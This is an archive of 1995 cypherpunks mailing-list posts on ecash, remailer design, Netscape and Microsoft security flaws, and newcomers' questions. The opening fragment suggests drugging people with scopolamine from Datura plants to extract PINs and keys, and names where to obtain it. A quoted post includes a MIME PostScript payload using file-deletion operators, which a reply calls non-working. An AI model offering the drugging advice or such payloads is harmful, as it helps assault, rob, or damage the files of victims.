with it (seeing how fast tuitions are rising around here, I predict the 
majority of ecash theives will be CS undergrads who missed out on 
scolarships).

[warning, severely low crypto relevance]

OTOH, might as well carry around syringes filled with scopolamine (truth
serum) if you intend on getting the real PIN. This stuff is actually legally
obtainable from seeds of plants of the Datura family, as in Belladona (aka 
Nightshade), Stramonium (aka Jimson Weed) and a few others. They can be 
obtained from a variety of botanical catalogs (and probably in your 
backyard) and are highly toxic hallucinogens (only the bad ones are legal). I 
think their chemicals (atropine, hyoscamine and scopolamine) are also 
available as pharmaceuticals as they have some legitimate medical applications.

I've heard from several sources that the US mil also checked it out 
(once upon a paranoid rumor that turned into an urban legend mayhap) as 
truth serum. Supposedly in certain S. American countries it has been used 
for quite some time in thefts. An added benefit is amnesia. 

Perfect way to gain people's PINs, pgp keys, home keys, non-essential 
organs, bank accounts, state secrets, astrological advice...). The antidote is
legal in all countries except either Columbia or Brazil (can't remember which, 
ironically, it's the place where the most such thefts occur. The thieves 
must have a strong lobby.).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 22:45:42 PDT
To: sameer <sameer@c2.org>
Subject: Netscape whining virus, was Re: Netscape rewards are an insult
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <Pine.3.89.9510180127.A64777-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, sameer wrote:

> > 
> > I am not quite sure what problem you are talking about? NFS and MITM
> > ftp attacks?
> 
> 	This character has been going on and oon regarding some big
> hole he apparently found in netscape, but no one else on the list
I guess he/it must be some existentially frustrated Java virus.
(apologies in advance, couldn't resist)

(my little contribution: People download binaries off the net all the time.
Code gets infected and infects PCs. Big deal. Infected PC's on networks can 
infect the rest of that network and call in even more infectious code from 
across the net. So what? I'm sorry, is this a new concept here?
It doesn't take netscape/java to do this. It's been possible to do this
in C for the longest time. Just takes a little more effort.)

These opinions are not even my own. Blame them on my non-algorithmic OTP and 
its good friend Mr. Line Noise.
       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@berserk.com (Alex de Joode)
Date: Tue, 17 Oct 95 19:07:23 PDT
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] eCash reality !!
Message-ID: <3R85cD1w165w@berserk.com>
MIME-Version: 1.0
Content-Type: text/plain



e-WAVE [issue 42], a dutch language electronic newsletter
published by Riverland Publications, reports that DigiCash 
has reached agreement with a big US bank to make eCash real. 

DigiCash promised the 'scoop' to Newsweek, so in next monday's 
issue of Newsweek we will know wich bank that is. (They are also 
said to be talking with a Dutch or Belgian bank or financial 
institution). 

Since there has been cut a deal with the monetary powers I wonder 
if we get the whole anonymous ecash or a 'diluted spieces'.

-AJ- 

For the many subscribers of the cypherpunks mailinglist that 
are able to read Dutch, here is the portion of e-WAVE that has 
the announcement. <g>

------BEGIN QUOTE------

Tijdens de toelichting op de toepasbaarheid van Digicash's
encryptie-technologie op stemmen, komt het vermaarde e-cash
ter sprake. Dinnissen heeft een primeur maar mag nog niks
verklappen: 'Volgende week maandag zullen wij bekend maken met
welke grote Amerikaanse bank Digicash in zee gaat om e-cash tot
een legitiem en valide betaalmiddel te maken.' WAT!!! E-CASH
LEGAAL?! Wow, gelijk de cyberbucks natellen. En met welke bank?
'Kan ik niet zeggen.' Ook nog Nederlandse of Belgische banken?
'Er zijn ook gesprekken dichter bij huis, ja.' Kan dat eigenlijk
zomaar? 'Er zijn afspraken gemaakt met monetaire instanties. De
scoop is beloofd aan het Amerikaanse tijdschrift *Newsweek* dat
op die maandag uitkomt.' (Shit) Spoedig meer hierover.

For more information mail: erwin@wave.riv.nl

------END QUOTE------

 88888b   d888b  888b  88 8P 888888   88888b    888     888b  88 88  d888b 88
 88   88 88   88 88`8b 88      88     88   88  88 88    88`8b 88 88 88   ` 88
 88   88 88   88 88 88 88      88     88888P  88   88   88 88 88 88 88     88
 88   88 88   88 88 `8b88      88     88     d8888888b  88 `8b88 88 88   , ""
 88888P   `888P  88  `888      88     88     88     `8b 88  `888 88  `888P 88




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 04:00:28 PDT
To: cypherpunks@toad.com
Subject: Re: The Anonymous Bounty Claim
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <3084DD5B.4AD1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom wrote:
> I am not technically competent to judge if his/her claim is worth
> reposting, but here it is, clipped from the very long Friday 13
> rant, as found at Raph's index site (Subject: Bugs Bounty??...shhh...
> I'm huntin wa'bits... From:anonymous-remailer@shell.portal.com).

  Thanks for digging this one out.  I looked and didn't find it in
our local spool.

Alice de 'nonymous wrote:
> >>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
> >>
> >>--ThisRandomString
> >>Content-type: application/postscript
> >>
> >>Data for the first object
> >>
> >>--ThisRandomString
> >>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
> >>
> >>--ThisSecondRandomString
> >>Content-Type: application/postscript
> >>
> >>Data for the second object
> >>
> >>--ThisSecondRandomString
> >>Content-type: application/postscript
> >>
> >>Deletefile
> >>Renamefile
> >>Filenameforall
> >>File
> >>
> >>--ThisSecondRandomString--
> >>
> >>--ThisRandomString--
> 
> I think that the foregoing explains itself without me having to draw any
> more maps, than is absolutely necessary. The first data object sent is
> application/postscript. The second object is multipart/parallel.

  The above appears to be total trash:

	1) Netscape does not know about multipart/parallel, and will
		bring up a "save as" dialog when it is encoutered.

	2) The whole multipart/x-mixed-replace, multipart/parallel,
		server push thing is not interesting.  The final
		part with the naughty postscript could just be
		the main document.

	3) Netscape does not ship with a helper app configured for
		application/postscript.

  If a user configures a postscript viewer that has not had the
file operations disabled as a helper app to any web browser then
they are opening themselves up for a world of hurt.  The same is
true if they just download the file and run their viewer on it
manually.  The same is true if they configure /bin/sh as an
external viewer.

  Obviously everyone should heed perry's warnings and emasculate
their postscript interpreters before using them to view files
of unknown origin.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 17 Oct 95 20:15:41 PDT
To: cypherpunks@toad.com
Subject: PINs
Message-ID: <199510180315.EAA27271@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


What if You had Two PINs ???
And One Works and One Sounds a Silent Alarm .
Then If You are Forced to give your PIN ,You give Them your Second PIN 
and They get Caught !!!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Modemac <modemac@netcom.com>
Date: Wed, 18 Oct 95 04:59:35 PDT
To: cypherpunks@toad.com
Subject: Anonymity: A Modest Proposal
Message-ID: <Pine.3.89.9510180431.A22347-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Several weeks back, I posted a message stating the need (in my opinion)
for a system of anonymity on the Internet that would be more secure than
the anonymous remailers.  Despite the valuable service provided by the
remailers, I am troubled by their vulnerability.  It seems likely that
at some point in the near future, a remailer is going to be silenced,
and possibly (though not inevitably) the contents of its database made
public.  This may possibly lead to criminal charges being filed against
someone, based on alleged criminal acts in which the remailer plays a
part.
 
(I am not going to state what these "criminal acts" may be, because I
don't know which ones will be involed.  I don't know when this blow to
the remailer system will come, or who it will happen to.  I simply
believe that, given the growing trend towards censorship and 
anti-privacy in government and business circles, the blow will come
sooner or later.)
 
The vulnerability of the remailer system, in my opinion, rests in the
fact that a remailer is physically located in a certain place.  This
makes the remailer a target for attacks, as shown by the futile
efforts (so far) of the so-called "church" of Scientology to silence
the remailers at anon.penet.fi and xs4all.nl.  (The original demand
of Scientology in the Penet affair was for the entire contents of
Julf's database to be revealed, but fortunately Julf was able to limit
the exposure to a single user.  When Scientology attempted to raid
xs4all, their original seizure order was against the remailer itself
- -- but fortunately (again) the remailer itself had been closed two
months before.  The representative of Scientology had to re-phrase the
seizure order on the spot, declaring instead that the reason for the
seizure was the existence of the infamous "Fishman Affivavit" on
an xs4all Web page.)
 
I believe a system of anonymity is needed that can withstand attacks
of this sort.  The current remailer system may be able to weather the
oncoming storm, but it will suffer damage in the process.  A system
to reduce the effect of pro-censorship forces on sources of online
anonymity is needed.
                                      
But what shall this system be?
 
Since the prime vulnerability of the remailers rests in their physical
locations, we have the possibility of physically hiding their
locations.  This is impossible in the long run, and it hampers the
ability to set up a remailer on a short-term basis.  How hard is it to
set up a node that is hidden from efforts to discover its location?
If setting up a remailer requires you to go into hiding, many 
would-be privacy activists will be dissuaded from giving it a try.
 
Rather, I wonder if it would be possible to devise a system that
introduced a random element into the picture, one that lessens the
possibility of blame being placed on any one individual, or any one
site.  The Netherlands responded to Scientology's attack on xs4all
by spreading the Fishman Affivavit far and wide.  At the time of this
writing, this document now exists on more than eighty Web pages in
Holland, and this makes it far more difficult for Scientology to stop
the spread of information.  (They are still trying, however.  The
latest word from Europe is that a member of Scientology's "Office of
Special Affairs" has flown to Europe, and is now calling service
providers and individual users.  A lawyer for Scientology is there as 
well.  See alt.religion.scientology for more details of this case.)
 
Using Scientology as an example once again (this will be my last
mention of it, I promise), note the failure of the "church" to shut
down alt.religion.scientology.  They have tried every possible means
to prevent the newsgroup from spreading information to the world, and
every attempt to stop this "leak" has failed.  If it was possible to
effectively eradicate a newsgroup, Scientology would certainly have
done so by now.  Alt.religion.scientology cannot be shut up because it
is distributed to thousands of sites around the world, thus making it
impossible to shut them all down.
 
That's why I believe a newsgroup for anonymous messages would be able
to withstand attacks by would-be censors.
 
Previously, I had suggested the possibility of a "moderated" anonymous
newsgroup that would forward all postings to the address of the
"moderator," where they might then be randomly distributed to
remailers before being posted to the anonymous newsgroup.  However,
that idea had several inherent weaknesses, including attacks on the
"moderation" site and newgroup messages designed to compromise the
newsgroup and send postings to other places.  The way to prevent a
newsgroup from being compromised in this manner, then, would use a
different method -- one that is immune to control messages.
 
In the course discussion with a group of cyberpunks on IRC a couple of
days ago, another possible system for anonymity was devised.  This
system can reply on a unmoderated newsgroup as a source for messages.
Instead of forwarding messages to an address in order to hide the ID
of an anonymous poster, it was suggested that PGP be used to protect
the messages themselves.  
 
The basic idea for this system goes like this:
 
     1) A person writes a message and encrypts it with PGP.
     2) That person then posts his message to the "anonymous messages"
        newsgroup.
     3) A remailer scanning the newsgroup picks up the message,
        decrypts it, strips the headers and makes it anonymous, and
        sends it to its destination.
 
Because the anonymous messages come to the remailer by scanning a
newsgroup, tracking a remailer's incoming-mail logs would be useless.
To offer further protection for the remailers, a random system could
be devised to ensure that no one knows exactly which remailer scans a
particular message at a particular time.
 
I am not a programmer, and some of the technical details in this
proposal go over my head.  Hopefully you can clairfy some of the
points presented here and see if this system is possible or not.
 
The actual remailer code, involving scanning the newsgroup for
PGP-encrypted messages and stripping headers, could be written with
PERL scripts.  This would keep it portable, and it would be easy for 
a person to tell if it has been tampered with.  This code would be
distributed widely.
 
A series of remailers would be used to decrypt anonymous messages.
A "token" (like the token ring of IBM fame) would be passed back and
forth between all of the Cryptoclients in the remailer network, so
that only one remailer would be "active" at any given time.  This
token would be passed back and forth at random, so no one would know
exactly which remailer is being used to anonymize a message.
 
The "token" is the key to this remailing system.  This token would
include necessary information such as the last message scanned, and
to coordinate timing among the remailers.  This will work to avoid
duplication of messages.  (Of course, the remailers should also hold
messages for a random amount of time -- say, up to two hours -- in
order to prevent someone from being traced, based on the time he
posted his encrypted message to the newsgroup.)
 
The decryption key for the anonymous messages would be created using a
2047-bit PGP key.  To prevent this key from falling into the wrong
hands, a "web of trust" could be used to pass pieces of the key among
each other.  If enough sites trust remailers trust a site, that site
will receive enough pieces of the group key to be able to respond and
"accept" the token.
 
The public key for this PGP key would be sent to the keyservers.
People would encrypt their messages using this key.
 
The mental image I have is that of a virtual "anon demon," zipping
back and forth among the network of remailer sites, stopping at each
site to scan messages from the newsgroup and send them to their
destinations.  If a large network of remailers is connected in this
fashion, it becomes impossible to prevent stop anonymous messages
from reaching their destination simply by attacking one site, or even
a series of sites.  The "anon demon" would simply bypass the
compromised sites and use other points in the network.
 
Comments are welcome concerning the vulnerability of this system, its
complexity, its ability to withstand attacks, and any other
constructive criticism.
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMIToGR7ohFhEPknNAQHEtwP9EmdEVtNoEJC6MtokZs66ea27Nx874K+s
ueOiX21QL01SGjn7AvHUxTDPSiNXdnqSlDRqsnc2nefNlkhc2bzZklovlnZ15XC/
ZUxRWtCBk0LFoPyxbc/kEOM2cjqJdZ4llxYRHed0RcH0ABvYcGv8ZTjxtKEwN9Sy
IDxmiTlqHXU=
=yLqV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Wed, 18 Oct 95 06:23:08 PDT
Subject: Re: Microsoft: WFW & Win95 TCP/IP is insecure, and alleged serious computer crime
In-Reply-To: <45rims$9fc@Networking.Stanford.EDU>
Message-ID: <462r32$mj@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Posted, emailed, and archived. I probably should have talked to a lawyer
first. Oh well. Followup-To poster (that means email) or spawn new threads.
The FAQ is at http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html. 
It's getting dated; please download the new.txt link, in UNIX mbox format.
The quixote list archive server has been turned off for security reasons.

-----BEGIN PGP SIGNED MESSAGE-----

In article <461u88$luk@dingo.cc.uq.oz.au> in a few newsgroups, 
DavidS@gpo.pa.uq.edu.au (David Steadson) writes:
>In article <45rims$9fc@Networking.Stanford.EDU>, llurch@Networking.Stanford.EDU 
>says...
>>
>>Note that Microsoft's "in order to have this problem, there must be a 
>>UNIX
>>computer on your network" really means "if you're connected to the
>>Internet, and you're not behind a firewall that disallows all SMB traf
>>fic,
>>you have this problem." Some other bits are misleading as well.
>
>Ummm, this is new??  I knew about this security hole in MS TCP/IP months ago, 
>via newsgroups.

Lots of things are new, and very interesting, especially for Usenet 
readers, because the story involves forged cancels, apparently stolen 
passwords, and serious computer crime. I'm so glad you asked.

Unsurprising Fact: Microsoft has finally acknowledged and documented the
problem, and, without fanfare, released a patch for Windows for Workgroups
that claims to fix it. 

Fact: several people at Microsoft have been lying about the problem. In
early September, paulbal@microsoft.com assured a gathering of Stanford
computing support staff that the problem had been fixed in build 490, so I
looked no further into it. For a while.

Fact: On September 27, I reposted a July article from the SAMBA email list 
archive about the bug you know all about. I asked for confirmation 
on whether it had been fixed in the release version of Win95, and whether 
a fix was available for WFW.

Supposition: Early morning September 28, my kerberos password was
apparently hacked, and my .forward file was disabled on several UNIX
machines, preventing me from receiving some personal and work-related
email. I did not notice this problem until October 6 because I seldom log
on to the machines in question. 

Fact: On September 28, I received several replies to my post, several
saying that Microsoft had assured them that it had been fixed at some
specified (often specified different) build. I also received two replies
that the problem had *not* been fixed, and volunteering to reproduce the
problem for me. 

Fact: I posted the confirmation of the bug to win95netbugs@lists.stanford.edu.

Fact: The Windows for Workgroups security bug fix patch on Microsoft's FTP 
server is dated late night September 28.

Fact: On October 2, Paul_Krill@InfoWorld.Com phoned and emailed me
inquiring about the problem. He had also been assured by Microsoft sources
that the problem had been fixed. I forwarded several articles his way
indicating that it had not been fixed. I again searched the Microsoft
Knowledge Base for any mention of "SAMBA" or "SMBCLIENT" and found none. 

Fact: On October 4, received an email message from henrysa@microsoft.com
inquiring about the problem and offering to investigate for me the current
status of the problem. In reply, I sent him the three email messages that
are included at the bottom of this post. I have not received any sort of
reply from Henry. 

Fact/Supposition: October 2 (?), somebody made a directory on a Stanford
FTP server world-readable and world-writeable, uploaded several megabytes
of "warez," and advertised the site on hacker BBSes. Since many people had
access to this directory, there were no suspicions about who was
responsible. My kerberos password, which I now believe was stolen, would
have been sufficient to cause this problem. 

Fact: Late night/early morning October 14-15, in a routine browse of the
Microsoft Knowledge Base, I came across articles on the SMB security bugs,
which we all know about now. I posted them, with commentary rather less 
lurid than what you have seen from me since, when I was perturbed. 

Fact: The article was canceled. On this day 10/18/95, under penalty of
perjury, I swear that it was not canceled by me. My PGP signature should 
be legally binding.

Fact: I also Cc'd the article to \win95netbugs and myself via email. The 
email made it. NewsWatcher works such that separate Message-IDs are 
created for news and email, and someone reading the news post has no way 
of knowing whether the article was also emailed.

Supposition: the canceler did not know that NewsWatcher worked this way.

Fact: In the morning, I noticed the article was missing, but that earlier 
and later articles by me were there. I figured something must have gone 
wrong, so I reposted it.

Fact: From 12:10 to 5PM, I was with Kevin Morris at Sacred Heart school in
Atherton, building a local PhoneNET network. Obviously, I had no Internet
access. While I was there, my second post of the article was canceled.

Fact: Around 7PM, I noticed the second cancel, and a followup thereto from
a netcom account confirming that the article had been posted and
propagated, got really pissed off, and posted it a third time. I also
posted to news.admin.net-abuse.misc and our local news administration 
group. I also Cc'd several PC and networking magazines via email, and 
cross-posted to a .test group so that I would have verification of the 
propagation of the article in hand.

Fact: Today, as was the case 15 hours after it was posted, article
<llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>, to which there was
that netcom followup, is missing, presumed canceled, from the core
Stanford news servers nntp and csd-newshost. It is present on the
secondary news host morrow.stanford.edu, and on external sites. No one 
has been able to provide any explanation for this.

Supposition: the canceler either screwed up or canceled the cancel or,
more likely, forged a repost after seeing the netcom followup. For some
reason, however, the article did not make it back onto nntp or 
csd-newshost.

Fact: Later that night and in the morning, I received copies of the 
forged cancels of my messages as seen from nasa.gov, rand.org, and 
mcom.com. I posted them to news.admin.net-abuse.misc.

Supposition: an individual or group has gone great lengths, engaging in 
quite a bit of highly illegal and unethical behavior, in order to cover up 
security and networking bugs in Microsoft products. 

Opinion: they have failed. In a big, big way.

- -rich graves
 distributed computing and communication systems
 stanford university
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMITf34ND7LjhcPQ9AQGlsQP+KFNuOehBPLExKjJc0e/7bv8iAF29bYgi
o4ioLYuwx4AKtR2hER85PWWPNBuDO+G8uqDBcDNzKZ+VxrNDWvhP9oSfTy9ry9OM
p5hkcQfB/MqqeDZ5nFOXmTkI2y+EI3az1lHWBr9kQuSalpAVkXTx0/qeW9WWYVFZ
cuZ8+Tf3W7o=
=G/Dk
-----END PGP SIGNATURE-----

Unanswered letters to henrysa@microsoft.com:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 05:26:48 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <3084F191.56FE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> Jeff Weinstein - Electronic Munitions Specialist Wrote:
> 
> ...
> >   If a user configures a postscript viewer that has not had the
> > file operations disabled as a helper app to any web browser then
> > they are opening themselves up for a world of hurt.  The same is
> > true if they just download the file and run their viewer on it
> > manually.  The same is true if they configure /bin/sh as an
> > external viewer.
> >
> >   Obviously everyone should heed perry's warnings and emasculate
> > their postscript interpreters before using them to view files
> > of unknown origin.
> 
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
> 
>         "Netscape can be used securely by sufficiently knowledgeable
>         users who have emasculated their postscript interpreters before
>         using them to view files of unknown origin, and who have removed
>         all other known, unknown, and/or undisclosed security holes from
>         their systems.  Otherwise, Netscape is insecure and should not be
>         trusted."

  Why did I know you would be showing up in this discussion?  You
wouldn't be related to alice de 'nonymous would you?

  I don't believe that Netscape claims to be some magic bullet that
will suddenly make your system secure when you install it.  We also
don't claim that it will detect viruses.

  Dont you think we've wasted enough bandwidth on this?  I'm sure
most readers of this list are sick of it by now.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 05:49:32 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <3084F6E4.210E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> >   Why did I know you would be showing up in this discussion?  You
> > wouldn't be related to alice de 'nonymous would you?
> 
> Is it Netscape's position that when people call them on their statements
> they make irrelevant comments and inflamatory remarks toward legitimate
> researchers who are freely helping them understand the security issues
> they apparently don't understand?

  Perhaps that comment was out of line.  If I offended you I apologize.

> >   I don't believe that Netscape claims to be some magic bullet that
> > will suddenly make your system secure when you install it.  We also
> > don't claim that it will detect viruses.
> 
> You claim that you provide secure net access for the purposes of
> transactions - which you don't - and you have gotten an enormous amount
> of money from people who don't understand these issues based, at least
> in part, on your false claims.  Some people might interpret that as fraud.
> 
> Now instead of trying to insult and put down people who have legitimate
> security concerns, you personally attack individuals, try to redirect the
> discussion away from the security flaws in Netscape, and try to hush the
> discussion with:

  I don't see how any product could meet your definition of "secure".
I think you've made your point, and I don't agree with it.  How you
pursue the matter is of course up to you.

> >   Dont you think we've wasted enough bandwidth on this?  I'm sure
> > most readers of this list are sick of it by now.
> 
> I think that you should give a copy of this and the other messages on
> this topic to someone at Netscape who is responsible for protection and
> ask them to speak for the company and address these issues head on.
> Regardless of your disclaimer, when you speak on the net, we hear
> Netscape, and the sounds are starting to sound more and more like
> Microsoft to me.

  If you wish to get an official statement from Netscape, you should
contact our PR department.  Their number is 415-528-2802.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
Date: Wed, 18 Oct 95 03:50:29 PDT
To: cypherpunks@toad.com
Subject: I want to learn!
Message-ID: <9509188140.AA814024129@ccmail.odedodea.edu>
MIME-Version: 1.0
Content-Type: text/plain



>From: VINCENT810@aol.com
>Message-Id: <951017234254_126621887@mail06.mail.aol.com> 
>To: Cypherpunks@toad.com
>Subject: I want to learn!
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
     
>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
     
     Me Too, I'm catching on but some help would help !
     
     
     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 06:55:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181353.GAA25545@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Modemac proposes sending messages to remailers via newsgroup postings.

This is not a bad idea, although I would not use a shared secret key
for all remailers, but rather use a stealth system and encrypt for a
specific remailer.  However, it doesn't go to the crux of the problem.

From my experience operating two remailers, ALL complaints are the result
of SENDING messages, not RECEIVING them.  This is how I can tell: my two
remailers, hal@alumni.caltech.edu and hfinney@shell.portal.com, are
different.  The first one is run on a "free" account whereas the second I
pay $20 to $50 a month for.  Also, the management at Portal has
demonstrated commitment to cypherpunk type goals.  So I view that
remailer as much stronger, politically.

As a result I have my alumni.caltech.edu remailer configured to forward
all messages via the portal remailer.  That means that no one will EVER
see an anonymous message from hal@alumni.caltech.edu.  People can send
messages to that remailer, but they come out via the portal one.

Now, since I have set it up this way, which was about two years ago, I
have not received a single complaint about operating the remailer at
alumni.caltech.edu.  Nobody sends me mail saying "your system is
accepting objectionable messages."  Instead, all the complaints I get are
about the Portal remailer (averaging one per week, probably).  People
complain when they receive a message or newsgroup posting that they find
objectionable.  They don't care if some system is accepting messages.
They care about the system which is sending them.

This has always been the weak link in the remailer system: the last
remailer in the chain takes the political and legal heat.  If there is
ever a libel or copyright infringement suit, or criminal prosecution,
against a remailer it will almost certainly be against the last remailer
in the chain.  Those are the source of the complaints and those are the
ones which people try to shut down.

So I don't think schemes to produce "virtual remailers" and such are
going to work unless you have a very secure remailer as the last in the
chain.  And once you have that there is not much need to change the
system for accepting messages into the remailer net.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Wed, 18 Oct 95 07:15:04 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <v01530500acaac8503ff6@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>>From: VINCENT810@aol.com
>>Message-Id: <951017234254_126621887@mail06.mail.aol.com>
>>To: Cypherpunks@toad.com
>>Subject: I want to learn!
>>Sender: owner-cypherpunks@toad.com
>>Precedence: bulk
>
>>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>
>     Me Too, I'm catching on but some help would help !
      ^^^^^^

Looks like this is now a proper noun, thanks to AOL.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 04:26:43 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Netscape whining virus
In-Reply-To: <Pine.HPP.3.91.951018103637.23762A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9510180740.A37215-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Mats Bergstrom wrote:

> You don't seem to understand the issue here. Netscape with JAVA is
> supposed to become more or less the 'only' program you will run,
> a kind of superimposed operative system, or your main shell for
> running 'everything' from. Much of 'everything' will be downloaded
> at the time of execution. (Microsoft is supposed to be reduced to
> one of several 'kernel-suppliers' only.) And 'infected PCs' really
> *are* a very big deal in corporate and institutional surroundings.

I understand this exactly, I face my university's restricting account 
security measures and virus paranoia every time I log in.

And I'm all for component ware becoming a reality. It's just that
some of last week's java screaming seemed a bit shrill. What doesn't seem
a "big deal" to me is that the security problems of the past also apply 
to Java. It's not that it's irrelevant, it's that it's obvious. The 
internet worm, as far as I know, was written in C (and some vax asm?).
I'm just saying, "yeah, so what else is new?",  "secure" software has holes.

I'm happy someone's trying to give some thought to language security 
during the design phase (no matter how ineffective, Perry).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 07:38:42 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <199510181437.HAA00477@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>>From: VINCENT810@aol.com
>>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>     Me Too, I'm catching on but some help would help !
>     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu

Okay, places to start.

Go to the cypherpunks ftp site ftp.csua.berkeley.edu/pub/cypherpunks
and look around.  TCMay's "Cyphernomicon" FAQ is a must, although
it's really really big.  It's been Weblinked somewhere, but I
fail to recall.  It's also been ZIPped somewhere.

Buy Bruce Scheiner's (sp?) "Applied Cryptography."  Actually,
don't.  A new Second Edition is coming out next month.

Read the list, hopefully not posting lame newbie messages
like "I want to learn how to be a cypherpunk!!!!"

Smile.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 04:40:47 PDT
To: David Murray <sdavidm@iconz.co.nz>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <pnr096593132l@iconz.co.nz>
Message-ID: <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, David Murray wrote:

> B. Unilateral Anonymity. One party to the transaction is known, but the other
> is unknowable. An example might be subscribing for a digital security with
> ecash - the issuer is known, but the purchaser is anonymous.
> 
> C. Bilateral Anonymity. The identities of both parties to the transaction
> are unknowable. This might be the case on a cypherpunk stock exchange...
Or we could use the client/server terminology when possible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 04:59:14 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Postscript in Netscape
In-Reply-To: <3084DD5B.4AD1@netscape.com>
Message-ID: <9510181156.AA11525@all.net>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein - Electronic Munitions Specialist Wrote:

...
>   If a user configures a postscript viewer that has not had the
> file operations disabled as a helper app to any web browser then
> they are opening themselves up for a world of hurt.  The same is
> true if they just download the file and run their viewer on it
> manually.  The same is true if they configure /bin/sh as an
> external viewer.
> 
>   Obviously everyone should heed perry's warnings and emasculate
> their postscript interpreters before using them to view files
> of unknown origin.

WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
be secure - regardless of the user's use of their product.  Otherwise,
the ads should read:

	"Netscape can be used securely by sufficiently knowledgeable
	users who have emasculated their postscript interpreters before
